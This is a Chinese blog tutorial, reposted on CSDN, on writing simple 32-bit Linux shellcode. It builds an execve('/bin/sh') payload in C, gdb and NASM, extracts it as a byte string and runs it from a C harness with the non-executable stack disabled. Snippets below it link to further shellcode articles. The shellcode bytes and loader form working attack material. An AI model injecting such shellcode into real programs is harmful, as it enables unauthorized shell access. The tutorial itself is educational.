简单shellcode编写

最新推荐文章于 2024-04-23 08:49:24 发布
最新推荐文章于 2024-04-23 08:49:24 发布
阅读量308 收藏
点赞数
文章标签: 操作系统 shell
原文链接:http://www.cnblogs.com/zUotTe0/p/10527129.html
版权

0x00 介绍

Shellcode 是指经过精心设计的一串指令,一旦注入正在运行的应用程序中即可运行,常用于栈和基于堆的溢出。术语Shellcode意思指的便是用于启动一个命令Shell的已编写好的可执行代码。

0x01 预写c调用程序

在linux中以C编写程序调用"/bin/sh"。

#include "unistd.h"
#include "stdio.h"

char * buff[] = {"/bin/sh", NULL};
void main(){
    execve("/bin/sh", buff, NULL);
}

以execve开启一个bash进程,调用路径为/bin/sh。
注:/bin/sh是一个指向dash的符号链接,实际运行的也是dash程序,dash即移植到linux的bash,比bash更小也更快。[#!/bin/bash和#!/bin/sh是什么意思以及区别]

0x02 gdb调试

以gdb打开编译好的文件,我调试的文件的为32-bit的,在64-bit中可以在gcc加上参数-m32即可编译为32-bit elf文件。(gcc-multilib)
1164674-20190313202018454-414068417.png
图中 1 处调用execve函数,通过plt表调用,而 2 处栈中已将参数压入,分别为程序路径、参数数组、环境变量数组(此处为NULL)。
接着跟进,找到execve是怎么调用的:
1164674-20190313223044973-1062048345.png
1164674-20190313223049417-891388579.png
可以看到在0xf7e8b68d处赋予eax值0xb,0xb(11)为execve的系统调用号。下一步执行到系统调用中断(call dword ptr gs:0x10)时,ebx指向的是“/bin/sh”字符串,ecx指向的是{“/bin/sh”,NULL}数组,edx为0。于是execve在32位linux系统中的参数传递方式为“参数1->ebx;参数2->ecx;参数3->edx”。
call *%gs:0x10 call will __kernel_vsyscall
32位的中断调用可采用int 80;而64位可采用syscall。

elf32函数系统调用号查看方式:cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep execve

64位查看:cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep execve

0x03 编写汇编代码

最终只有一个目的,就是使得参数存入寄存器,然后系统调用。

section .text
global _start
_start:
  xor   eax, eax
  push  eax                  ; 字符串结尾 ==> NULL
  push  "//sh"               ; '/bin//sh'
  push  "/bin"
  mov   ebx,esp              ; '/bin//sh' address
  push  eax                  ; push 0
  push  ebx 
  mov   ecx,esp              ; array of argvs
  xor   edx,edx              ; edx = 0
  mov   al,0x0b             ; call execve
  int 80h

编译:nasm -f elf32 -o test32 ./call_execve.asm
链接:ld -m elf_i386 -o atest ./test32
执行:

1164674-20190313234321593-1106597009.png
执行成功!
然后提取shellcode,objdump -d atest:
1164674-20190313235011537-767298032.png
Shellcode:"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
1164674-20190313235528027-140156082.png
然后用C代码测试shellcode是否可用。

#include "unistd.h"
#include "stdio.h"

void main(){
    char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
    (*(void(*)())shellcode)();
}

其中的(*(void(*)())shellcode)();也可替换成((void(*)())shellcode)();,测试之后没有问题。在网上查找资料之后发现数据指针的*value操作符是取value地址下的数据,而在函数指针中*value则是将eip移至value地址处进行执行,而比如平时写程序的函数func();func也指向一个函数存储的位置,但是缺省了*

编译并执行:gcc -z execstack -m32 -o ssssss shellcode_run_execve.c

1164674-20190314001150399-1055877174.png
成功运行,但是得加上 -z execstack关闭NX,因为shellcode作为局部变量存于栈上。

0x04 总结

这是新的尝试,收获良多,计算机底层知识很重要。

0x05 参考文章

手把手简易实现shellcode及详解

转载于:https://www.cnblogs.com/zUotTe0/p/10527129.html

weixin_30469895
关注
shellcode编写国外精典文档
04-05
### Shellcode编写国外经典文档知识点解析 #### 一、Shellcode简介 Shellcode是一种非常小的机器码程序,主要用于在漏洞利用过程中执行恶意操作。它通常被用来绕过安全机制或者执行特定的操作,如打开一个命令行...
(*(void (*) () )shellcode) ();的含义
Yannie's Blog
12-07 1029
我们在写执行shellcode的语句的时候,可以直接写成这样的一行 ( * (void ( * ) () )shellcode) () 那这一行又是什么意思呢? 我们来从简单的开始: typedef void (*Fun) (void)是什么意思呢? 这里我们就需要了解:typedef有一个用法,可以用来定义函数指针 此处 Fun 是指向这样一个函数的指针,该函数的返回值为void类型,函数没有参...
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 816
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcode的c语言程序:123456char shellcode[] = "";int (int argc, char...
1.4 编写简易ShellCode弹窗
CSDN
08-28 4951
在前面的章节中相信读者已经学会了使用`Metasploit`工具生成自己的`ShellCode`代码片段了,本章将继续深入探索关于`ShellCode`的相关知识体系,ShellCode 通常是指一个原始的可执行代码的有效载荷,攻击者通常会使用这段代码来获得被攻陷系统上的交互Shell的访问权限,而现在用于描述一段自包含的独立的可执行代码片段。ShellCode代码的编写有多种方式,通常会优先使用汇编语言实现,这得益于汇编语言的可控性。
Shellcode编写
最新发布
weixin_54452942的博客
04-23 1122
二是ESI寄存器的值自动增加32位,也就是当第一轮执行之后,esi中放的是下一个函数名称的地址,继续将其指向的内存空间的前四个字节送到eax中(也就是函数名称列表中的第一个函数名称的前四个字节),同时esi加4,指向了第二个函数名称的地址,一直向后比对,直到每个字节都比对成功后,此时的ecx中存的就是目标函数在函数名称列表中的位置。这个成员在PEB结构体中的偏移量是0x0C。在32位Windows系统中,FS寄存器指向TEB的起始地址,而在64位Windows系统中,GS寄存器指向TEB的起始地址。
windows平台下功能性shellcode编写
11-12
本主题聚焦于Windows平台下的功能性Shellcode编写,这是一种高级技术,涉及到深入理解操作系统内部工作原理、汇编语言以及可能的高级编程技巧。 1. **Windows Shellcode基础知识**: - Shellcode是二进制代码,...
Delphi编写ShellCode的示例
02-22
然而,实际的ShellCode编写可能涉及到更复杂的技巧,如堆栈清理、地址计算、编码解码以避开检测等。 在标签"delphi shellcode"下,我们可以进一步讨论如何将Delphi代码转换为ShellCode,以及如何将ShellCode注入到...
vbs shellcode转换escape加密
09-06
它支持自动化任务执行、文件操作等,因此非常适合用于编写处理shellcode的脚本。通过VBS,安全研究人员或恶意软件开发者可以实现shellcode的加载、解密和执行等功能。 #### 知识点四:VBS中的正则表达式使用 在本...
函数指针
dianyun7150的博客
06-25 81
void func(void){} //函数指针 void(*func_ptr)(void) = &func; func_ptr(); struct Foo { void operator()(void){ } }; //仿函数 Foo foo; foo(); struct A { ...
一个简单shellcode如何写
qq_42764617的博客
12-01 1030
简单shellcode execve("/bin/sh",0,0); 通过简单的汇编将这句shellcode描写出来 eax = 0xb ebx = “/bin/sh” ecx = 0 edx = 0 int 0x80 section .text global _start _start: xor eax,eax ;eax=0 push 0x0068732f ;/sh\x00 push 0x6e69622f ;/bin mov ebx,esp ;这里是将/bin/sh的地址传给
shellcode编写
qq_44657899的博客
05-26 2715
文章目录注意事项基础知识开始编写第一步 初始化第二步 实现其他函数动态调用第三部 实现GetProcAddress和LoadLibraryA的动态调用获取kernel32.dll基址动态调用GetProcAddress实战CreateFileAMessageBoxA导出shellcode第一种shellcode编写实例1第一种shellcode编写实例2(优化结构)shellcode加载器 注意事项 不使用全局变量 不使用类似于"abc"这样的字符串,通过数组定义字符串,char name[] = {0x
简单Shellcode的详细分析
wangkr的专栏
11-20 2999
作 者: moonflow 百年一遇的高级光棍节,我得写篇详细完整的文章才行。初学者,菜文,老鸟请飘过 分析段简单shellcode代码 1.shellcode.c 代码: #include   static char shellcode[]=    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x4
3个月的SHELLCODE研究成果-一个最简单Shellcode
小发猫
10-28 3451
坚持到底,永不放弃。我终于写了个小小的SHELLCODE啦。就拿这个星期来说,我日思夜想,为什么我总写不出可以正确执行的SHELLCODE呢,非常郁闷,也整天板着脸想问题,差点吓着小MM同事了。我本来ASSEMBLY基础不是很好,只懂得可怜的几个INSTRUCTIONS,写SHELLCODE时碰到了很多不认识的Instructions。还要上网差资料,有时真的是一头雾水。我看了很多前辈写的SHEL
执行shellcode的几种方式
qq_41683305的博客
02-24 4904
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
Linux x86_64 shellcode编写
小立仔
07-06 1609
Linux x86_64 shellcode编写
如何编写shellcode
05-20
编写shellcode通常需要了解汇编语言和计算机系统的底层知识。以下是一个简单的示例,可以作为起点: ``` section .text global _start _start: xor eax, eax ; 把 EAX 寄存器清零 push eax ; 把 0 压入栈中 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值